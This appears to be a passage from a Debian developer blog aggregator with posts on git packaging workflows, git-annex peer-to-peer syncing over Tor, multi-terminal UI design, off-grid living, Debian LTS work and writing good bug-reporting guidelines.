There have been two long threads on the debian-devel mailing list about the representation of the changes to upstream source code made by Debian maintainers. Here are a few notes for my own reference. I spent a lot of time defending the workflow I described in dgit-maint-merge(7) (which was inspired by this blog post). However, I came to be convinced that there is a case for a manually curated series of patches for certain classes of package. It will depend on how upstream uses git (rebasing or merging) and on whether the Debian delta from upstream is significant and/or long-standing. I still think that we should be using dgit-maint-merge(7) for leaf or near-leaf packages, because it saves so much volunteer time that can be better spent on other things. When upstream does use a merging workflow, one advantage of the dgit-maint-merge(7) workflow is that Debian's packaging is just another branch of development. Now consider packages where we do want a manually curated patch series. It is very hard to represent such a series in git. The only natural way to do it is to continually rebase the patch series against an upstream branch, but public branches that get rebased are not a good idea. The solution that many people have adopted is to represent their patch series as a folder full of .diff files, and then use gbp pq to convert this into a rebasing branch. This branch is not shared. It is edited, rebased, and then converted back to the folder of .diff files, the changes to which are then committed to git (see the sketch at the end of this post). One of the advantages of dgit is that there now exists an official, non-rebasing git history of uploads to the archive. It would be nice if we could represent curated patch series as branches in the dgit repos, rather than as folders full of .diff files. But as I just described, this is very hard. However, Ian Jackson has the beginnings of a workflow that just might fit the bill.
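For concreteness, a rough sketch of that gbp pq round trip, assuming the patches live in debian/patches/ as usual:
gbp pq import    # build a local patch-queue branch from debian/patches/
# ...edit commits, rebase onto the new upstream version...
gbp pq export    # write the branch back out as files in debian/patches/
git add debian/patches
git commit -m "refresh patch series"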

6 January 2017

Joey Hess: the cliff

Falling off the cliff is always a surprise. I know it's there; I've been living next to it for months. I chart its outline daily. Avoiding it has become routine, and so comfortable, and so failing to avoid it surprises. Monday evening around 10 pm, the laptop starts draining down from 100%. House battery, which has been steady around 11.5-10.8 volts since well before Winter solstice, and was in the low 10's, has plummeted to 8.5 volts. With the old batteries, the cliff used to be at 7 volts, but now, with new batteries but fewer, it's in a surprising place, something like 10 volts, and I fell off it. Weather forecast for the week ahead is much like the previous week: Maybe a couple sunny afternoons, but mostly no sun at all. Falling off the cliff is not all bad. It shakes things up. It's a good opportunity to disconnect, to read paper books, and think long winter thoughts. It forces some flexibility. I have an auxiliary battery for these situations. With its own little portable solar panel, it can charge the laptop and run it for around 6 hours; that's enough to get me through the night. But it takes it several days of winter sun to charge back up. Then I take a short trip, and glory in one sunny afternoon. But I know that won't get me out of the hole; the batteries need a sunny week to recover. This evening, I expect to lose power again, and probably tomorrow evening too. Luckily, my goal for the week was to write slides for two talks, and I've been able to do that despite being mostly offline, and sometimes decomputered. And, in a few days I will be jetting off to Australia! That should give the batteries a perfect chance to recover. Previously: battery bank refresh, late summer

1 January 2017

Joey Hess: p2p dreams

In one of the good parts of the very mixed bag that is "Lo and Behold: Reveries of the Connected World", Werner Herzog asks his interviewees what the Internet might dream of, if it could dream. The best answer he gets is along the lines of: The Internet of before dreamed a dream of the World Wide Web. It dreamed some nodes were servers, and some were clients. And that dream became current reality, because that's the essence of the Internet. Three years ago, it seemed like perhaps another dream was developing post-Snowden, of dissolving the distinction between clients and servers, connecting peer-to-peer using addresses that are also cryptographic public keys, so authentication and encryption and authorization are built in. Telehash is one hopeful attempt at this; others include snow, cjdns, i2p, etc. So far, none of them seem to have developed into a widely used network, although any of them still might get there. There are a lot of technical challenges due to the current Internet dream/nightmare, where the peers on the edges have multiple barriers to connecting to other peers. But, one project has developed something similar to the new dream, almost as a side effect of its main goals: Tor's onion services. I'd wanted to use such a thing in git-annex, for peer-to-peer sharing and syncing of git-annex repositories. On November 13th, I started building it, using Tor, and I'm releasing it concurrently with this blog post.
git-annex's Tor support replaces its old hack of tunneling the git protocol over XMPP. That hack was unreliable (it needed a TCP-over-XMPP layer), but worse, the XMPP server could see all the data being transferred. And, there are fewer large XMPP servers these days, so fewer users could use it at all. If you were using XMPP with git-annex, you'll need to switch to either Tor or a server accessed via ssh.
Now git-annex can serve a repository as a Tor onion service, and that can then be accessed as a git remote, using an url like tor-annex::tungqmfb62z3qirc.onion:42913. All the regular git, and git-annex commands, can be used with such a remote. Tor has a lot of goals for protecting anonymity and privacy. But the important things for this project are just that it has end-to-end encryption, with addresses that are public keys, and allows P2P connections. Building an anonymous file exchange on top of Tor is not my goal -- if you want that, you probably don't want to be exchanging git histories that record every edit to the file and expose your real name by default. Building this was not without its difficulties. Tor onion services were originally intended to run hidden websites, not to connect peers to peers, and this kind of shows.. Tor does not cater to end users setting up lots of Onion services. Either root has to edit the torrc file, or the Tor control port can be used to ask it to set one up. But, the control port is not enabled by default, so you still need to su to root to enable it. Also, it's difficult to find a place to put the hidden service's unix socket file that's writable by a non-root user. So I had to code around this, with a git annex enable-tor that su's to root and sets it all up for you.
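Put together, the setup on each peer is roughly as follows (a sketch using only the commands and the example address from this post; real addresses will differ, and the pairing step described below is still needed before a peer is authorized):
sudo git annex enable-tor        # configures the onion service; needs root, as explained above
git remote add peer tor-annex::tungqmfb62z3qirc.onion:42913
git annex sync --content peer    # sync git history and annexed file contents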
One interesting detail about the implementation of the P2P protocol in git-annex is that it uses two Free monads to build up actions. There's a Net monad which can be used to send and receive protocol messages, and a Local monad which allows only the necessary modifications to files on disk. Interpreters for Free monad actions can choose exactly which actions to allow for security reasons. For example, before a peer has authenticated, the P2P protocol is being run by an interpreter that refuses to run any Local actions whatsoever. Other interpreters for the Net monad could be used to support other network transports than Tor.
When two peers are connected over Tor, one knows it's talking to the owner of a particular onion address, but the other peer knows nothing about who's talking to it, by design. This makes authentication harder than it would be in a P2P system with a design like Telehash. So git-annex does its own authentication on top of Tor. With authentication, users would need to exchange absurdly long addresses (over 150 characters) to connect their repositories. One very convenient thing about using XMPP was that a user would have connections to their friends' accounts, so it was easy to share with them. Exchanging long addresses is too hard. This is where Magic Wormhole saved the day. It's a very elegant way to get any two peers in touch with each other, and the users only have to exchange a short code phrase, like "2-mango-delight", which can only be used once. Magic Wormhole makes some security tradeoffs for this simplicity. It's got vulnerabilities to DOS attacks, and its MITM resistance could be improved. But I'm lucky it came along just in time. So, it takes only installing Tor and Magic Wormhole, running two git-annex commands, and exchanging short code phrases with a friend, perhaps over the phone or in an encrypted email, to get your git-annex repositories connected and syncing over Tor. See the documentation for details. Also, the git-annex webapp allows setting the same thing up point-and-click style. The Tor project blog has throughout December been featuring all kinds of projects that are using Tor. Consider this a late bonus addition to that. ;) I hope that Tor onion services will continue to develop to make them easier to use for peer-to-peer systems. We can still dream a better Internet.
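As an aside, the code-phrase idea is easy to get a feel for with the standalone magic-wormhole command-line tool (this is its ordinary file-transfer mode, not the way git-annex drives it internally):
wormhole send ./photo.jpg    # prints a one-time code, something like "7-crossover-clockwork"
wormhole receive             # run on the other machine; type the code when prompted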
This work was made possible by all my supporters on Patreon.

27 December 2016

Joey Hess: multi-terminal applications

While learning about and configuring weechat this evening, I noticed a lot of complexity and unsatisfying tradeoffs related to its UI, its mouse support, and its built-in window system. Got to wondering what I'd do differently, if I wrote my own IRC client, to avoid those problems. The first thing I realized is, it is not a good idea to think about writing your own IRC client. Danger, Will Robinson.. So, let's generalize. This blog post is not about designing an IRC client, but about exploring simpler ways that something like an IRC client might handle its UI, and perhaps designing something general-purpose that could be used by someone else to build an IRC client, or be mashed up with an existing IRC client. What any modern IRC client needs to do is display various channels to the user. Maybe more than one channel should be visible at a time in some kind of window, but often the user will have lots of available channels and only want to see a few of them at a time. So there needs to be an interface for picking which channel(s) to display, and if multiple windows are shown, for arranging the windows. Often that interface also indicates when there is activity on a channel. The most recent messages from the channel are displayed. There should be a way to scroll back to see messages that have already scrolled by. There needs to be an interface for sending a message to a channel. Finally, a list of users in the channel is often desired. Modern IRC clients implement their own UI for channel display, windowing, channel selection, activity notification, scrollback, message entry, and user list. Even the IRC clients that run in a terminal include all of that. But how much of that do they need to implement, really? Suppose the user has a tabbed window manager, that can display virtual terminals. The terminals can set their title, and can indicate when there is activity in the terminal. Then an IRC client could just open a bunch of terminals, one per channel. Let the window manager handle channel selection, windowing (naturally), and activity notification. For scrollback, the IRC client can use the terminal's own scrollback buffer, so the terminal's regular scrollback interface can be used. This is slightly tricky; can't use the terminal's alternate display, and have to handle the UI for the message entry line at the bottom. That's all the UI an IRC client needs (except for the user list), and most of that is already implemented in the window manager and virtual terminal. So that's an elegant way to make an IRC client without building much new UI at all. But, unfortunately, most of us don't use tabbed window managers (or tabbed terminals). Such an IRC client, in a non-tabbed window manager, would be a many-windowed mess. Even in a tabbed window manager, it might be annoying to have so many windows for one program. So we need fewer windows. Let's have one channel list window, and one channel display window. There could also be a user list window. And there could be a way to open additional, dedicated display windows for channels, but that's optional. All of these windows can be separate virtual terminals. A potential problem: When changing the displayed channel, it needs to output a significant number of messages for that channel, so that the scrollback buffer gets populated. With a large number of lines, that can be too slow to feel snappy. In some tests, scrolling 10 thousand lines was noticeably slow, but scrolling 1 thousand lines happens fast enough not to be noticeable.
(Terminals should really be faster at scrolling than this, but they're still writing scrollback to unlinked temp files.. sigh!)

An IRC client that uses multiple cooperating virtual terminals needs a way to start up a new virtual terminal displaying the current channel. It could run something like this:
x-terminal-emulator -e the-irc-client --display-current-channel
That would communicate with the main process via a unix socket to find out what to display. Or, more generally:
x-terminal-emulator -e connect-pty /dev/pts/9
connect-pty would simply connect a pty device to the terminal, relaying IO between them. The calling program would allocate the pty and do IO to it. This may be too general to be optimal, though. For one thing, I think that most curses libraries have a singleton terminal baked into them, so it might be hard to have a single process run curses on multiple ptys. And, it might be inefficient to feed that 1 thousand lines of scrollback through the pty and copy it to the terminal.

Less general than that, but still general enough to not involve writing an IRC client, would be a library that handled the irc-client-like channel display, with messages scrolling up the terminal (and into the scrollback buffer), an input area at the bottom, and perhaps a few other fixed regions for status bars and the like. Oh, I already implemented that! In concurrent-output, over a year ago: a tiling region manager for the console.

I wonder what other terminal applications could be simplified/improved by using multiple terminals? One that comes to mind is mutt, which has a folder list, a folder view, and an email view, all shoehorned, with some complexity, into a single terminal.
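Coming back to the connect-pty idea: here is a rough sketch in Python of what such a helper could look like. connect-pty is the hypothetical program imagined above, so everything here is an assumption, not an existing tool; a real implementation would at least also need to propagate window size changes.

#!/usr/bin/env python3
# Sketch of the hypothetical connect-pty: relay IO between a given pty
# device and the terminal this program runs in. The calling program is
# assumed to have allocated the pty pair and to do its IO on the master
# side, while we open the slave side (e.g. /dev/pts/9) passed as argv[1].
import os
import select
import sys
import termios
import tty

def main():
    ptyfd = os.open(sys.argv[1], os.O_RDWR)
    stdin = sys.stdin.fileno()
    saved = termios.tcgetattr(stdin)
    tty.setraw(stdin)  # pass keystrokes through to the pty unmodified
    try:
        while True:
            ready, _, _ = select.select([ptyfd, stdin], [], [])
            if ptyfd in ready:
                try:
                    data = os.read(ptyfd, 4096)
                except OSError:
                    break  # the master side went away; we are done
                if not data:
                    break
                os.write(sys.stdout.fileno(), data)
            if stdin in ready:
                data = os.read(stdin, 4096)
                if not data:
                    break
                os.write(ptyfd, data)
    finally:
        termios.tcsetattr(stdin, termios.TCSADRAIN, saved)

if __name__ == '__main__':
    main()

Invoked as in the example above (connect-pty /dev/pts/9), this would let one main process drive any number of terminals through their ptys. It also makes the performance worry concrete: every line of scrollback has to travel through the pty and be copied to the terminal.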

30 November 2016

Joey Hess: drought

Drought here since August. The small cistern ran dry a month ago, which has never happened before. The large cistern was down to some 900 gallons. I don't use anywhere near the national average of 400 gallons per day; more like 10 gallons. So I could have managed for a few more months. Still, this was worrying, especially as the area moved from severe to extreme drought according to the US Drought Monitor.

Two days of solid rain fixed it, yay! The small cistern has already refilled, and the large will probably be full by tomorrow. The winds preceding that same rain storm fanned the flames that destroyed Gatlinburg. Earlier, fire got within 10 miles of here, although that may have been some kind of controlled burn.

Climate change is leading to longer-duration weather events in this area. What tended to be a couple of dry weeks in the fall has become multiple months of drought and weeks of fire. What might have been a few days of winter weather and a few inches of snow before the front moved through has turned into multiple weeks of arctic air, with multiple 1 ft snowfalls. What might have been a few scorching summer days has become a week of 100-110 degree temperatures. I've seen all that over the past several years. After this, I'm adding "additional, larger cistern" to my todo list. Also "larger fire break around house".

16 November 2016

Joey Hess: Linux.Conf.Au 2017 presentation on Propellor

On January 18th, I'll be presenting "Type driven configuration management with Propellor" at Linux.Conf.Au in Hobart, Tasmania. Linux.Conf.Au is a wonderful conference, and I'm thrilled to be able to attend it again. -- Update: My presentation on keysafe has also been accepted for the Security MiniConf at LCA, January 17th.

31 October 2016

Antoine Beaupr : My free software activities, October 2016

Debian Long Term Support (LTS)

This is my 7th month working on Debian LTS, started by Raphael Hertzog at Freexian, after a long pause during the summer. I have worked on a number of packages and CVEs, and I have also helped review work on the following packages:
  • imagemagick: reviewed BenH's work to figure out what was done. Unfortunately, I forgot to officially take on the package and Roberto started working on it in the meantime. I nevertheless took the time to review Roberto's work and outline possible issues with the originally suggested patchset
  • tiff: reviewed Raphael's work on the hairy TIFFTAG_* issues, all the gory details in this email
The work on ImageMagick and GraphicsMagick was particularly intriguing. Looking at the source of those programs makes me wonder why we are still using them at all: it's a tangled mess of C code that is bound to bring up more and more vulnerabilities, time after time. It seems there's always a "Magick" vulnerability waiting to be fixed out there... I somehow hoped that the fork would bring more stability and reliability, but it seems they are suffering from similar issues because, fundamentally, they haven't rewritten ImageMagick... It looks like this is something that affects all image programs. The review I have done on the tiff suite gives me the same shivering sensation as reviewing the "Magick" code. It feels like all image libraries are poorly implemented and thus bound to be exploited somehow... Nevertheless, if I had to use a library of the sort in my software, I would stay away from the "Magick" forks and try something like imlib2 first...

Finally, I also did some minor work on the user and developer LTS documentation and some triage work on samba, xen and libass. I also looked at the dreaded CVE-2016-7117 vulnerability in the Linux kernel to verify its impact on wheezy users. I also looked at implementing a --lts flag for dch (see bug #762715).

It was difficult to get back to work after such a long pause, but I am happy I was able to contribute a significant number of hours. It's a bit difficult to find work sometimes in LTS-land, even though there's actually always a lot of work to be done. For example, I used to be one of the people doing frontdesk work, but those duties are now assigned until the end of the year, so it's unlikely I will be doing any of that for the foreseeable future. Similarly, a lot of packages were already assigned when I started looking at the available packages. There was an interesting discussion on the internal mailing list regarding unlocking package ownership, because some people had packages locked for weeks, sometimes months, without significant activity. Hopefully that situation will improve after that discussion.

Another interesting discussion I participated in is the question of whether the LTS team should be waiting for unstable to be fixed before publishing fixes in oldstable. It seems the consensus right now is that it shouldn't be mandatory to fix issues in unstable before we fix security issues in oldstable and stable. After all, security support for testing and unstable is limited. But I was happy to learn that working on brand new patches is part of our mandate as part of the LTS work. I did work on such a patch for tar, which ended up being adopted by the original reporter, although upstream ended up implementing our recommendation in a better way.

It's coincidentally the first time since I started working on LTS that I didn't get the number of requested hours, which means that there are more people working on LTS. That is a good thing, but I am worried it may also mean people are more spread out and less capable of focusing for longer periods of time on more difficult problems. It also means that the team is growing faster than the funding, which is unfortunate: now is as good a time as any to remind you to see if you can make your company fund the LTS project if you are still running Debian wheezy.

Other free software work

It seems like forever since I last did such a report, and a lot has happened in the meantime, including while I was on vacation.

Monkeysign

I have done extensive work on Monkeysign, trying to bring it kicking and screaming into the new world of GnuPG 2.1. This was the objective of the 2.1 release, which collected about two years of work and patches, including arbitrary MUA support (e.g. Thunderbird), config file support, and a release on PyPI. I have had to publish about 4 more releases to try and fix the build chain, ship the test suite with the program and add a primitive preferences panel. The 2.2 release also finally features Tor support! I am also happy to have moved more documentation to Read the Docs, part of which I mentioned in a previous article. The git repositories and issues were also moved to a Gitlab instance, which will hopefully improve the collaboration workflow, although we still have issues in streamlining the merge request workflow.

All in all, I am happy to be working on Monkeysign, but it has been a frustrating experience. In the last years, I have been maintaining the project largely on my own: although there are about 20 contributors in Monkeysign, I have made over 90% of the commits in the code. New contributors recently showed up, and I hope this will relieve some of the pressure on me as the sole maintainer, but I am not sure how viable the project is.

Funding free software work

More and more, I wonder how to sustain my contributions to free software. As a previous article has shown, I work a lot on the computer, even when I am not on a full-time job. Monkeysign has been a significant time drain in the last months, and I have done this work on a completely volunteer basis. I wouldn't mind so much, except that there is a lot of other work I do on a volunteer basis too. This means that I sometimes must prioritize paid consulting work, at the expense of those volunteer projects.

While most of my paid work usually revolves around free software, the benefits of paid work are not always immediately obvious, as the primary objective is to deliver to the customer, and the community as a whole is somewhat of a side-effect. I have watched with interest joeyh's adventures into crowdfunding, which seem to be working pretty well for him. Unfortunately, I cannot claim the incredible (and well-deserved) reputation Joey has, and even if I could, I can't live on $500 a month. I would love to hear if people would be interested in funding my work in such a way.

I am hesitant to launch a crowdfunding campaign because it is difficult to identify what exactly I am working on from one month to the next. Looking back at earlier reports shows that I am all over the place: one month I'll work on a Perl wiki (Ikiwiki), the next one I'll be hacking at a multimedia home cinema (Kodi). I can hardly think of how to fund those things short of "just give me money to work on anything I feel like", which I can hardly ask of anyone. Even worse, it feels like the audience here is either friends or colleagues. It would make little sense for me to seek funding from those people: colleagues have the same funding problems I do, and I don't want to impoverish my friends...

So far I have taken the approach of trying to get funding for work I am doing, bit by bit. For example, I have recently been told that LWN actually pays for contributed articles and have started running articles by them before publishing them here. This is looking good: they will publish an article I wrote about the Omnia router I recently received. I give them exclusive rights on the article for two weeks, but I otherwise retain full ownership over the article and will publish it here after the exclusive period. Hopefully, I will be able to find more such projects that pay for the work I do on a day-to-day basis.

Open Street Map editing

I have ramped up my OpenStreetMap contributions, having (temporarily) moved to a different location. There are lots of things to map here: trails, gas stations and lots of other things are missing from the map. Sometimes the effort looks a bit ridiculous, reminding me of my early days of editing OSM. I have registered with OSM Live, a project to fund OSM editors that, I must admit, doesn't help much with funding my work: with the hundreds of edits I did in October, I received the equivalent of $1.80 CAD in Bitcoin. This may be the lowest hourly salary I have ever received, probably going at a rate of 10¢ per hour! Still, it's interesting to be able to point to the project if someone wants to support OSM mappers. But mappers should have no illusions about getting a decent salary from this effort, I am sorry to say.

Bounties

I feel this is similar to the "bounty" model used by the Borg project: I claimed around $80 USD in that project for what probably amounts to tens of hours of work, yet another salary that would qualify as "poor". Another example is a feature I would like to implement in Borg: support for protocols other than SSH. There is currently no bounty on this, but a similar feature, S3 support, has one of the largest bounties Borg has ever seen: $225 USD. And the claimant for the bounty hasn't actually implemented the feature: instead of backing up to S3, the patch (to a third-party tool) actually enables support for Amazon Cloud Drive, a completely different API. Even at $225, I wouldn't be able to complete any of those features and get a decent salary. As well explained by the Snowdrift reviews, bounties just don't work at all... The ludicrous 10% fee charged by Bountysource made sure I would never do business with them ever again anyway.

Other work

There are probably more things I did recently, but I am having difficulty keeping track of the last 5 months of on-and-off work, so you will forgive me for not being as exhaustive as I usually am.

14 October 2016

Antoine Beaupr : Managing good bug reports

Bug reporting is an art form that is too often neglected in software projects. Bug reports allow contributors to participate without deep technical knowledge and at the same time provide a crucial space for developers to be made aware of issues with their software that they could not have foreseen or found themselves, for lack of resources, variety or imagination.

Prior art

Unfortunately, there are rarely good guidelines for submitting bug reports. Historically, people have pointed towards How to report bugs effectively or How to ask questions the smart way. While those guides can be useful for motivated people and may seem like attractive references for project managers, they suffer from serious issues:
  • they are written by technical people, for non-technical people
  • as a result, they have a deeply condescending attitude such as calling people "stupid" or various animal names like "mongoose"
  • they are also very technical themselves: one starts with a copyright notice and a changelog, the other uses magic words like "Core dumps" and $Id$
  • they are too long: sgtatham's is about 3600 words long, esr's is even longer at about 11800 words. Those texts will take an average reader about 20 to 60 minutes to read, according to research
Individual projects have their own guides as well. Linux has the REPORTING-BUGS file, a much shorter 1200 words that can be read in under 5 minutes, provided that you can understand the topic at hand. Interestingly, that guide refers to both esr's and sgtatham's guidelines, which means that, in the degenerate case where the user hasn't had the "privilege" of reading esr's prose already, they will have an extra hour and a half of reading to do to have honestly followed the guidelines before reporting the bug. I often find good documentation in the Tails project. Their bug reporting guidelines are easily accessible and quick to read, although they still might be too technical. It could be argued that you need to get technical at some point to get that information out, of course. In the Monkeysign project, I have started a bug reporting guide that doesn't yet address all those issues. I am considering writing a new guide, but I figured I would look at other people's work and get feedback before writing my own standard.

What's the point?

Why have those documents been written? Are people really expected to read them before seeking help? It seems to me unlikely that someone would:
  1. be motivated enough to do something about a broken part of their computer
  2. figure out they can do something about it
  3. read a fifteen-thousand-word novel about how to report a bug...
  4. just to finally write a 20-line bug report that has no warranty of support attached to it
And if I were a paying customer, I wouldn't want to be forced to waste my time reading that prose either: it's your job to help me fix your broken things, not the reverse. As someone doing consulting these days, I totally understand: it's not you, the user, it's us, the developers, that have a problem. We have been socialized through computers, and it makes us weird and obtuse, but that's no excuse, and we need to clean up our act.

Furthermore, it's surprising how often we get (and make!) bug reports that can be difficult to use. The Monkeysign project is very "technical" and I had expected that the bug reports I would get would be well written, with ways to reproduce and so on, but it happened that I received bug reports that were all over the place, didn't have any way of reproducing the issue, or were simply incomplete. Those three bug reports were filed by people that I know to be very technically capable: one is a fellow Debian developer, the second had filed a good bug report 5 days before, and the third one is a contributor that had sent good patches before. In all three cases, they knew what they were doing. Those three people have probably read the guidelines mentioned above at some point. They may have even read the Monkeysign bug reporting guidelines as well. I can only explain those bug reports by a lack of time: people thought the issue was obvious, that it would get fixed rapidly because, obviously, something is broken. We need a better way.

The takeaway

What are those guides trying to tell us?
  1. ask questions in the right place
  2. search for similar questions and issues before reporting the bug
  3. try to make the developers reproduce the issues
  4. failing that, try to describe the issue as well as you can
  5. write clearly, be specific and verbose yet concise
There are obviously contradictions in there, like sgtatham telling us to be verbose and esr telling us to, basically, not be verbose. There is definitely a tension there, and there are many, many more details about how great bug reports can be if done properly. I tend towards the side of terseness in our descriptions: people who know how to be concise will be; people who don't will most likely not learn by reading a 12,000-word novel that, in itself, didn't manage to be parsimonious. But I am willing to allow for verbosity in bug reports: I prefer too many details over missing a key bit of information.

Issue trackers

Step 1 is our job: we should send people to the right place and give them the right tools. Monkeysign used to manage bugs with bugs-everywhere, and this turned out to be a terrible idea: you had to understand git and bugs-everywhere to file any bug reports. As a result, there were exactly zero bug reports filed by non-developers during the whole time BE was used, although some bugs were filed in the Debian Bugtracker. So have a good bug tracker. A mailing list or email address is not a good bug tracker: you lose track of old issues, and it's hard for newcomers to search the archives. It does have the advantage of providing a unified interface for the support forum and bug tracking, however. Redmine, Gitlab, Github and others are all decent-enough bug trackers. The key point is that the issue tracker should be publicly available, and users should be able to register easily to file new issues. You should also be able to mass-edit tickets, and users should be able to discover the tracker's features easily. I am sorry to say that the Debian BTS somewhat falls short on those two features.

Step 2 is a shared responsibility: there should be an easy way to search for issues, and we should help the user look for similar issues. Stack Exchange sites do an excellent job at this, automatically searching for similar questions while you write yours, in an attempt to weed out duplicates. Duplicates still happen, but they can then clearly be marked and linked with a distinct mechanism. Most bug trackers do not offer such high-level functionality, but should, so I feel the fault lies more on "our" end than on the user's end.
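For illustration only, here is a small sketch of how a reporting tool could look for similar issues before filing a new one, using Github's public issue search API (the endpoint is Github's documented one; the repository name and query here are made up, and a real client would also handle authentication and rate limits):

#!/usr/bin/env python3
# Sketch: query Github's issue search API for possible duplicates
# before filing a new report. Illustrative only.
import json
import urllib.parse
import urllib.request

def find_similar(repo, keywords):
    # The /search/issues endpoint matches both issues and pull requests.
    params = urllib.parse.urlencode({'q': 'repo:%s %s' % (repo, keywords)})
    url = 'https://api.github.com/search/issues?' + params
    with urllib.request.urlopen(url) as resp:
        results = json.load(resp)
    return [(item['number'], item['title']) for item in results['items']]

# Example: look for prior reports of a crash on startup.
for number, title in find_similar('someuser/someproject', 'crash on startup'):
    print('#%d %s' % (number, title))

A tracker (or even the reporting tool itself) could run such a search automatically while the user types, Stack-Exchange-style, and suggest likely duplicates before the report is submitted.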

Reproducing the environment

Steps 3 and 4 are more or less the user's responsibility. We can detail in our documentation how to clearly share the environment where we reproduced the bug, for example, but in the end, the user decides if they want to share that information or not.

In Monkeysign, I have finally implemented joeyh's suggestion of shipping the test suite with the program. I can now tell people to run the test suite in their environment to see if this is a regression that is specific to their environment - so a known bug, in a way - or a novel bug for which I can look at writing a new unit test. I also include way more information about the environment in the --version output, an idea I brought forward in the borg project to ease debugging. That way, people can just send the output of monkeysign --test and monkeysign --version, and I have a very good overview of what is happening on their end. Of course, Monkeysign also supports the usual --verbose and --debug flags that users should enable when reproducing issues.

Another idea is to report bugs directly from the application. We have all seen Firefox or other software have automatic bug reporting tools, but somehow those seem unsatisfactory for a user: we have no feedback on where the report goes, or whether it's followed up on. It is useful for larger projects to get statistical data, but not so useful for users in the short term. Monkeysign tries to handle exceptions in the code in a graceful way, but could do better. We use a small library to handle exceptions, but that library has since been improved to directly file bugs against the Github project. This assumes the user is logged into Github, but it is nice to pre-populate bug reports with the relevant information up front.
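As an illustration of that --version idea, here is a minimal sketch of how a program might gather environment details for its version output. This is not Monkeysign's actual implementation; the version string and field choices are hypothetical:

# Sketch: enrich --version output with environment details to ease
# debugging. Not Monkeysign's actual code; fields are hypothetical.
import locale
import platform
import sys

__version__ = '2.2'  # hypothetical version string

def version_info():
    return '\n'.join([
        'monkeysign %s' % __version__,
        'Python: %s' % sys.version.replace('\n', ' '),
        'Platform: %s' % platform.platform(),
        'Locale: %s' % (locale.getdefaultlocale(),),
    ])

if __name__ == '__main__' and '--version' in sys.argv:
    print(version_info())

The point is that a user pasting this one command's output already answers several of the usual "what is your setup?" follow-up questions.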

Issue templates

In the meantime, to make sure people provide enough information, I have now moved a lot of the bug reporting guidelines to a separate issue template. That issue template is available through the issue creation form now, although it is not enabled by default, a weird limitation of Gitlab. Issue templates are available in both Gitlab and Github. Issue templates somewhat force users into a straitjacket: there is already something to structure their bug report. Those could be distinct form elements that had to be filled in, but I like the flexibility of the template, and the possibility for users to escape the formalism and just plead for help in their own way.
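To give an idea, a bug-report template along those lines might look something like the following. This is a hypothetical example, not Monkeysign's actual template; in Gitlab, such a template typically lives as a markdown file under .gitlab/issue_templates/ in the repository:

## Steps to reproduce

(Tell the developers exactly how to reproduce the failure, step by step.)

## Expected and actual behaviour

(What did you expect to happen, and what happened instead? Copy error messages verbatim, especially if they have numbers.)

## Environment

(Paste the output of monkeysign --test and monkeysign --version here; if possible, rerun the failing command with --debug and attach the output.)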

Issue guidelines

In the end, I opted for a short few paragraphs in the style of the Tails documentation, including a pointer to sgtatham's guide as optional further reading:
  • Before you report a new bug, review the existing issues in the online issue tracker and the Debian BTS for Monkeysign to make sure the bug has not already been reported elsewhere.
  • The first aim of a bug report is to tell the developers exactly how to reproduce the failure, so try to reproduce the issue yourself and describe how you did that.
  • If that is not possible, try to describe what went wrong in detail. Write down the error messages, especially if they have numbers.
  • Take the necessary time to write clearly and precisely. Say what you mean, and make sure it cannot be misinterpreted.
  • Include the output of monkeysign --test, monkeysign --version and monkeysign --debug in your bug reports. See the issue template for more details about what to include in bug reports.
If you wish to learn more about communication issues in bug reports, you can read How to Report Bugs Effectively, which takes around 20 to 30 minutes.
Unfortunately, short of rewriting sgtatham's guide, I do not feel there is much more we can do as a general guide. I find esr's guide to be too verbose and commanding, so sgtatham it will be for now.

The prose and literacy

In the end, there is a fundamental issue with reporting bugs: it assumes our users are literate and capable of writing amazing prose that we will enjoy reading as if it were the latest J.K. Rowling novel (if you're into that kind of thing). It's just an unreasonable expectation: some of your users don't even speak the same language as you, let alone read or write it. This makes for challenging collaboration, to say the least. This is where automated reporting makes sense: it doesn't require the user's intervention, and the communication is mediated by machines, without human intervention and its pesky culture. But we should, as maintainers, "be liberal in what we accept and conservative in what we send". Be tolerant, and help your users fix their issues. It's what you are there for, after all.

And in the end, we all fail the same way. In an attempt to improve the situation on bug reporting guides, I seem to have myself written a 2000-word short story that will have taken up a hopefully pleasant 10 minutes of your time at minimum. Hopefully I will have succeeded at being clear, specific, verbose and concise all at once, and I look forward to your feedback on how to improve our bug reporting culture.
